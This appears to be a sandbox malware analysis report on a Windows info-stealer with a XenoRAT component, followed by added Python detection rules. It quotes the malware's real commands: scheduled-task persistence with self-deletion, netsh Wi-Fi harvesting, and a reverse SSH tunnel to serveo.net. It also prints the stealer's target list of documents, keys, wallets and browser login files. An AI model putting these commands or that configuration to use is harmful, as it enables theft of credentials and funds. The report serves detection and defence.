Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.36.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.36.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.36.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.36.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.36.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.36.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.36.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.36.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.36.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.36.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ssh.exe, 0000001F.00000002.4563063171.000001E39F239000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: Amcache.hve.36.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.36.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.36.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.36.dr | Binary or memory string: VMware, Inc.
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.36.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.36.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: manager.exe, 0000002A.00000002.4561656216.000000000158B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?6
Source: Amcache.hve.36.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.dr | Binary or memory string: qemu'#
Source: Amcache.hve.36.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.36.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.36.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ssh.exe, 00000018.00000002.4563139619.0000020D735EA000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2640663700.0000019232F75000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3881086049.0000028989870000.00000004.00000020.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4457586264.000001ADB3577000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 0LpFv1haTA.exe, 00000007.00000002.4651451428.0000021F2AE09000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: Amcache.hve.36.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.36.dr | Binary or memory string: vmci.syshbin`
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.36.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.36.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.36.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 0LpFv1haTA.exe, 0000000D.00000002.2442666670.000001E459E15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Roaming\manager.exe | Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "0lpfv1hata" /sc minute /tr "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe" /rl highest /f && del /f /s /q /a "c:\users\user\desktop\0lpfv1hata.exe" &&start "" "c:\users\user\appdata\local\starlabs\0lpfv1hata.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Queries volume information: C:\Users\user\Desktop\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\manager.exe | Queries volume information: C:\Users\user\AppData\Roaming\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Queries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe | Queries volume information: C:\Users\user\AppData\Roaming\XenoManager\manager.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Queries volume information: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe VolumeInformation
Source: C:\Users\user\Desktop\0LpFv1haTA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
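The process chain recorded above is a compact set of detection opportunities: the dropper copies itself to %LocalAppData%\Starlabs, registers a minute-interval scheduled task at the highest run level, deletes the original binary and relaunches the copy; the copy enumerates saved WLAN profiles and nearby networks through netsh, opens a reverse SSH tunnel to serveo.net, and the dropped XenoRAT component registers a second task from an XML file in Temp. The following is an added example, not code from the report or from Joe Sandbox. It encodes those patterns as rules over process-creation events built from the command lines copied from the rows above, plus one constructed benign row; the rule names, event field names and the tunnel-broker list are this example's own choices.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]          # keys: parent (image), image (child), cmdline
Rule = Tuple[str, Callable[[Event], bool]]

# Process-creation rows copied from the report above; the last row is a
# constructed benign event to show the rules stay quiet on ordinary admin use.
REPORT_EVENTS: List[Event] = [
    {"parent": r"C:\Users\user\Desktop\0LpFv1haTA.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && '
                r'schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && '
                r'DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"'},
    {"parent": r"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'},
    {"parent": r"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r'"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net'},
    {"parent": r"C:\Users\user\AppData\Roaming\XenoManager\manager.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F'},
    {"parent": r"C:\Windows\System32\cmd.exe",            # constructed benign row
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r"netsh interface show interface"},
]

# Directories an unprivileged user can write to; a task whose action lives there
# and runs at highest privilege is the persistence pattern in the rows above.
USER_WRITABLE = r"\\(?:AppData|ProgramData|Users\\Public|Temp)\\"
SCHTASKS_CREATE = re.compile(r"schtasks(?:\.exe\"?)?\s+/create\b", re.I)
TUNNEL_BROKERS = {"serveo.net"}   # broker seen in the report; extend with your own list


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def _task_from_user_writable_dir(e: Event) -> bool:
    """schtasks /create whose /tr action sits in a user-writable directory at /rl HIGHEST."""
    c = e["cmdline"]
    return bool(SCHTASKS_CREATE.search(c)
                and re.search(r"/tr\s+\"?[^\"]*" + USER_WRITABLE, c, re.I)
                and re.search(r"/rl\s+highest\b", c, re.I))


def _self_delete_and_relaunch(e: Event) -> bool:
    """cmd chain that deletes its own parent binary and then starts another executable."""
    c = e["cmdline"]
    deletes_parent = re.search(r"\bdel\b(?:\s+/\w)*\s+\"?" + re.escape(e["parent"]), c, re.I)
    relaunches = re.search(r"\bstart\b[^&]*\"[^\"]+\.exe\"", c, re.I)
    return bool(deletes_parent and relaunches)


def _task_from_temp_xml(e: Event) -> bool:
    """schtasks /create fed a task definition from a Temp directory (the XenoRAT pattern)."""
    c = e["cmdline"]
    return bool(SCHTASKS_CREATE.search(c)
                and re.search(r"/xml\s+\"?[^\"]*\\Temp\\", c, re.I))


def _wlan_harvest(e: Event) -> bool:
    """netsh wlan show profiles / networks: saved Wi-Fi profiles and nearby BSSIDs."""
    return re.search(r"\bnetsh\s+wlan\s+show\s+(?:profiles?|networks?)\b", e["cmdline"], re.I) is not None


def _ssh_reverse_tunnel(e: Event) -> bool:
    """ssh.exe with a remote forward (-R) to a public tunnel broker."""
    if _basename(e["image"]).lower() != "ssh.exe":
        return False
    args = e["cmdline"].split()
    return "-R" in args and any(a.lower() in TUNNEL_BROKERS for a in args)


RULES: List[Rule] = [
    ("scheduled_task_from_user_writable_dir", _task_from_user_writable_dir),
    ("self_delete_and_relaunch", _self_delete_and_relaunch),
    ("scheduled_task_from_temp_xml", _task_from_temp_xml),
    ("wlan_profile_harvest", _wlan_harvest),
    ("ssh_reverse_tunnel_to_public_broker", _ssh_reverse_tunnel),
]


def run_rules(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, child image basename) for every rule that fires on each event."""
    hits: List[Tuple[str, str]] = []
    for e in events:
        for name, predicate in RULES:
            if predicate(e):
                hits.append((name, _basename(e["image"])))
    return hits


if __name__ == "__main__":
    for rule, image in run_rules(REPORT_EVENTS):
        print(f"{rule:40s} {image}")
```

The first row fires two rules at once (task from a user-writable directory, and self-deletion plus relaunch), which is the combination worth alerting on; a task created from a Temp XML or a single netsh wlan call is weaker evidence on its own and is better scored together with the parent image, as the report's own Sigma hits do.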

                      Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: Amcache.hve.36.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.36.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.36.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.36.dr | Binary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
Source: Yara match | File source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
